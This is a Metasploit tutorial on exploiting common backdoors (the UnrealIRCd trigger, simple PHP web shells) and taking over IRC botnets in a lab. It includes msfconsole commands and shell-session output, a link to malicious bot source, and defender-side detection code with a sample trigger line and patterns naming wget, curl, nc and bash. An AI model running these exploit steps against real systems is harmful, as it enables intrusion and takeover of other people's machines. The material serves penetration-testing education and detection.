In this article we will learn about Pwning Common Backdoors and Botnets.
Introduction [Pwning Common Backdoors and Botnets]:
Metasploit Framework has many exploit modules, including buffer overflow attacks, browser exploits, web application vulnerabilities, backdoor exploits, bot pwnage tools, etc. Exploit developers and contributors to the framework have shared a wide variety of interesting and very useful things.
In this article, we will talk about using Metasploit to hack and take over common backdoors and botnets. We will not cover all the modules, but we will mention some that might be useful in your future penetration testing work. We won’t be doing exploit development, so there’s no need to find your debuggers and code editors.
If you’re new to Metasploit Framework, especially msfconsole (the framework’s command-line interface), don’t worry as this is a simple step-by-step guide on how to use the exploit module as well. One of the things required for this tutorial is that you have Metasploit installed on your attacker machine, so I would recommend having Kali Linux or maybe BackBox Linux, which are penetration testing distributions and have Metasploit preinstalled.
For our target machine, I also recommend installing Metasploitable 2 on your favorite virtualization platform such as VMware or VirtualBox. Metasploitable 2 is a vulnerable Ubuntu Linux virtual machine that’s good for practicing your Metasploit-fu skills because it’s built to be insecure and is yours to play with.
The Metasploitable 2 virtual machine is configured with known services that come with backdoors and services with known exploits in the wild.
On port 6667, Metasploitable 2 has the UnrealIRCd IRC daemon running, which actually has a backdoor triggered by sending the letters “AB”, allowing an attacker to execute any system command with the privileges of the user running ircd. Now it’s good to exercise this vulnerability and see if we can pop a shell like it’s our lucky day. Fortunately, Metasploit has a module for this vulnerability under exploit/unix/irc/unreal_ircd_3281_backdoor.
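As an added, defender-side illustration (not code from the article or from UnrealIRCd), the following Python checks client-to-server IRC lines for the trigger shape described above: the trojaned daemon handed any input buffer beginning with “AB” to system(), so a sensor in front of port 6667 can flag such lines. The IRC lines are constructed here, and the verb grammar follows RFC 1459.

```python
import re
from typing import Dict, List

# RFC 1459 command grammar: a word of letters, or a three-digit numeric reply.
IRC_VERB_RE = re.compile(r'^([A-Za-z]+|[0-9]{3})$')

# Constructed client lines (not captured from the article's lab): a normal
# registration, then a line of the backdoor's trigger shape, then a normal JOIN.
# In the trojaned 3.2.8.1 daemon everything after the leading "AB" would be run
# by system() as the ircd user.
SAMPLE_STREAM = (
    "NICK tester\r\n"
    "USER tester 0 * :Test User\r\n"
    "AB;id > /tmp/out\r\n"
    "JOIN #lab\r\n"
)

def parse_irc_line(line: str) -> Dict[str, str]:
    """Split an IRC line into optional prefix, verb and the remaining parameters."""
    prefix = ""
    if line.startswith(":"):
        prefix, _, line = line[1:].partition(" ")
    verb, _, params = line.partition(" ")
    return {"prefix": prefix, "verb": verb, "params": params}

def find_backdoor_triggers(stream: str) -> List[Dict[str, str]]:
    """Return every line that would reach the backdoor (raw buffer starts with 'AB'),
    plus any line whose verb is not valid IRC and so deserves a look anyway."""
    findings = []
    for raw in stream.split("\r\n"):
        if not raw:
            continue
        msg = parse_irc_line(raw)
        if raw.startswith("AB"):
            # No legitimate IRC verb starts with "AB"; the tail is what system() gets.
            findings.append({"line": raw, "reason": "AB trigger", "would_run": raw[2:]})
        elif not IRC_VERB_RE.match(msg["verb"]):
            findings.append({"line": raw, "reason": "malformed verb", "would_run": ""})
    return findings
```

Running the backdoored daemon as an unprivileged user, as the text notes, limits what such a line could do even when it is not caught.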
Enter msfconsole to start the Metasploit command line interface. By typing info exploit/unix/irc/unreal_ircd_3281_backdoor we can see its description:
“This module exploits a malicious backdoor that was added to the Unreal IRCD 3.2.8.1 download archive. This backdoor was present in the Unreal3.2.8.1.tar.gz archive between November 2009 and June 12, 2010.”
Now is the time to take advantage of this sweet backdoor service!
W00t! We just got a shell. For more information on other vulnerable backdoor services, see the Metasploitable 2 Exploitability Guide.
But wait, Aurelius, I thought we were going to talk about common backdoors and botnet pwnage? Oh yes! We were just starting out with a simple and concise tutorial on how to use msfconsole and how to exploit the UnrealIRCd backdoor.
The goal was to show newbies that Metasploit also has these kinds of modules and isn’t just about remote code execution on web applications and buffer overflows in applications and services.
In our next example, we’ll talk about using a web backdoor using an exploit module I wrote, which is the Simple Backdoor Shell Remote Code Execution module. This module exploits unauthenticated simple web backdoor shells by using a vulnerable parameter of a common backdoor shell to execute commands.
Daniel Miessler and Jason Haddix’s OWASP SecLists project has many samples for these kinds of backdoors, categorized under payload.
Before we get into the Simple Backdoor Shell Remote Code Execution module, we first need to create a backdoor shell on our target computer. I recommend setting up an Apache server on a Linux VM and using the following vulnerable code:
I placed this code on my Ubuntu VM at /var/www/html/msfdev/vulnerable.php, so I should be able to browse to it at http://localhost/msfdev/vulnerable.php, as in the proof-of-concept image below, where arbitrary commands are executed through the exec parameter.
As you can see in the console output of the show options command, we have some required options (besides RHOST, RPORT and the usual options): the HTTP method via METHOD, the backdoor shell path via TARGETURI, and the command parameter or variable via VAR.
Assuming our target computer has an IP address of 192.168.150.136, we need to set RHOST to that IP address. For TARGETURI we need to define the path or location of our backdoor shell, /msfdev/vulnerable.php. Then for the VAR option we need to set exec, because that is the parameter through which arbitrary commands are executed. We don’t need to set the HTTP method, because the web backdoor accepts GET requests and is exploitable over GET.
msf exploit(simple_backdoors_exec) > set rhost 192.168.150.136
rhost => 192.168.150.136
msf exploit(simple_backdoors_exec) > set var exec
var => exec
msf exploit(simple_backdoors_exec) > set TARGETURI /msfdev/vulnerable.php
TARGETURI => /msfdev/vulnerable.php
msf exploit(simple_backdoors_exec) > exploit
[*] Reverse double handler started
[*] First client connection accepted…
[*] Second client connection accepted…
[*] Command: echo wE5lyQtBEHIWwFd4;
[*] Writing to socket A
[*] Writing to socket B
[*] Reading from sockets…
[*] Reading from socket A
[*] Answer: “wE5lyQtBEHIWwFd4\r\n”
[*] B is input…
[*] Command shell session 1 opened (192.168.150.129:4444 -> 192.168.150.136:49484) at 2016-02-22 09:24:57 -0500
And we just popped our second shell! That’s how you use this module to exploit simple command web shells.
Here are other exploit modules you could use that are related to this kind of module:
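As an added, defender-side illustration (not code from the article or the Metasploit module), the following Python scans Apache access-log lines for requests of the shape this module sends: the module’s check echoes a random 16-character token through the command parameter, and later commands arrive the same way. The log lines, the exec parameter name and the token are constructed to mirror the session above.

```python
import re
from typing import Dict, List, Optional
from urllib.parse import urlsplit, parse_qsl

# Constructed Apache combined-log lines (not from the article): one benign request,
# one probe of the kind simple_backdoors_exec sends through the "exec" parameter,
# and one follow-up command run through the same parameter.
SAMPLE_LOG = """\
192.168.150.129 - - [22/Feb/2016:09:24:55 -0500] "GET /msfdev/index.php?page=home HTTP/1.1" 200 512
192.168.150.129 - - [22/Feb/2016:09:24:57 -0500] "GET /msfdev/vulnerable.php?exec=echo%20wE5lyQtBEHIWwFd4%3B HTTP/1.1" 200 18
192.168.150.129 - - [22/Feb/2016:09:24:58 -0500] "GET /msfdev/vulnerable.php?exec=id%3Buname%20-a HTTP/1.1" 200 97
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)

# The module's check sends "echo <16 alphanumerics>;" and looks for the token in
# the response; that exact shape in a query-string value is a strong signal.
MSF_ECHO_RE = re.compile(r'^echo [A-Za-z0-9]{16};?$')
# Shell metacharacters or common binaries in a parameter value suggest the
# parameter is being used as a command channel rather than as application data.
SHELL_RE = re.compile(r'(;|\|\||&&|\$\(|`|\b(id|uname|whoami|wget|curl|nc|bash|sh|perl|python)\b)')

def classify_value(value: str) -> Optional[str]:
    """Label a decoded parameter value, or return None when it looks benign."""
    if MSF_ECHO_RE.match(value.strip()):
        return "metasploit-echo-probe"
    if SHELL_RE.search(value):
        return "shell-command"
    return None

def scan_log(text: str) -> List[Dict[str, str]]:
    """Parse each log line, URL-decode its query string and report suspicious parameters."""
    hits = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        url = urlsplit(m["target"])
        for param, value in parse_qsl(url.query, keep_blank_values=True):
            kind = classify_value(value)
            if kind:
                hits.append({"ip": m["ip"], "time": m["ts"], "path": url.path,
                             "param": param, "value": value, "kind": kind})
    return hits
```

The same decoding and pattern checks apply to POST bodies when the module is run with METHOD set to POST, but those are not in the access log and need request-body logging or a WAF to see.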
Th3 MMA mma.php Backdoor Arbitrary File Upload – This module exploits the Th3 MMA mma.php backdoor, which allows an arbitrary file to be uploaded, leading to the execution of arbitrary code. This backdoor also reveals the Linux kernel or operating system version through the php_uname() function.
Remote Code Execution of Zemra Botnet’s CnC Web Panel – This module exploits Zemra Botnet’s CnC web panel, which contains a backdoor in its leaked source code. Zemra is a criminal bot that can be used to perform DDoS attacks and is detected by Symantec as Backdoor.Zemra.
China Chopper Caidao PHP Backdoor Code Execution – This module exploits the China Chopper web shell, which is commonly used by Chinese hackers.
Horde 3.3.12 Backdoor Arbitrary PHP Code Execution – This module exploits an arbitrary PHP code execution vulnerability introduced as a backdoor in Horde 3.3.12 and Horde Groupware 1.2.10.
OpenX Backdoor PHP Code Execution – OpenX Ad Server version 2.8.10 shipped with an obfuscated backdoor from at least November 2012 to August 2013. Exploitation is simple and requires only one request with a rot13’d and reversed payload.
STUNSHELL Web Shell Remote PHP Code Execution – This module exploits unauthenticated versions of the “STUNSHELL” web shell. This module works when safe mode is enabled on the web server. This shell is widely used in automated RFI payloads.
And the list goes on. You can find many more modules to play with using the search backdoor command.
Another type of module I’ve written and contributed is focused on botnet takeovers. One good example is the w3tw0rk / Pitbul IRC Bot Remote Code Execution module. It exploits the w3tw0rk botnet by masquerading as, or registering your nickname as, the bot’s admin or herder on the IRC channel where the bot is idle or registered.
I’ll leave this one as a challenge, so I won’t explain the options and how to exploit this kind of bot, since there is already a screenshot showing the exploitation. I really think you can already see the pattern of setting up Metasploit from my previous instructions.
Here is the w3tw0rk / Pitbul IRC Bot source code or script that can be used for DDoS (Distributed Denial of Service) or DoS (Denial of Service) attacks: https://github.com/shipcod3/IRC-Bot-Hunters/blob/master/malicious_samples/w3tw0rk.txt. You need to run it on your virtual machine and make sure it connects to your own IRC server so your virtual machine doesn’t end up being captured by other bot herders and malware crusaders.
My inspiration for most of my bot modules is none other than the PHP IRC Bot pbot eval() Remote Code Execution module, which is the first IRC bot exploit in Metasploit. According to its description, “The module enables remote execution of commands on the PHP IRC bot pbot by abusing the use of eval() in the .php command implementation. In order for it to work, the data to connect to the IRC server and the channel to find the pbot must be provided. The module has been successfully tested on a pbot version analyzed by Jay Turla and published on the Infosec Institute, running on Ubuntu 10.04 and Windows XP SP3.”
I am not responsible for any damage this script may cause, but please use it for educational purposes only.
Other exploit modules related to Botnet takeover:
Xdh / LinuxNet Perlbot / fBot IRC Bot Remote Code Execution – This module allows remote execution of commands on an IRC bot developed by xdh. This Perl bot was caught by Conor Patrick with his Shellshock honeypot server and is categorized as fBot (Fire & Forget – DDoS Bot) by Markus Zank. Matt Thayer also found this script, which has a LinuxNet perlbot description. The bot only replies based on the server name and nickname in the IRC message, which are configured in the Perl script, so to spoof it and use this bot you need to be an operator on the IRC network, or at least have the IP configured in it.
Ra1NX PHP Bot PubCall Authentication Bypass Remote Code Execution – This module allows remote execution of commands on the Ra1NX PHP IRC bot by using the public call feature in a private message to covertly bypass the authentication system.
Legend Perl IRC Bot Remote Code Execution – This module exploits a remote command execution in the Legend Perl IRC Bot. This bot was used as a payload in the Shellshock spam of October 2014. This particular bot has features like NMAP scanning, TCP, HTTP, SQL and UDP flooding, the ability to remove system logs, and the ability to gain root and VNC capture. Kevin Stevens, Senior Threat Researcher at Damballa, uploaded this script to VirusTotal with md5 11a9f1589472efa719827079c3d13f76.
Dexter (CasinoLoader) SQL Injection – This module exploits a vulnerability found in the command and control panel used to control Dexter (Point of Sale malware). This is done by accessing the PHP page used by bots to report in (gateway.php) which does not sanitize the input. The input is encrypted and scrambled, but the key is supplied by the connecting bot. In this case, the ‘page’ parameter is used. The command and control panel specifies the location for uploading files and can be used as a reliable place to write the PHP shell. Authentication is not required to exploit this vulnerability.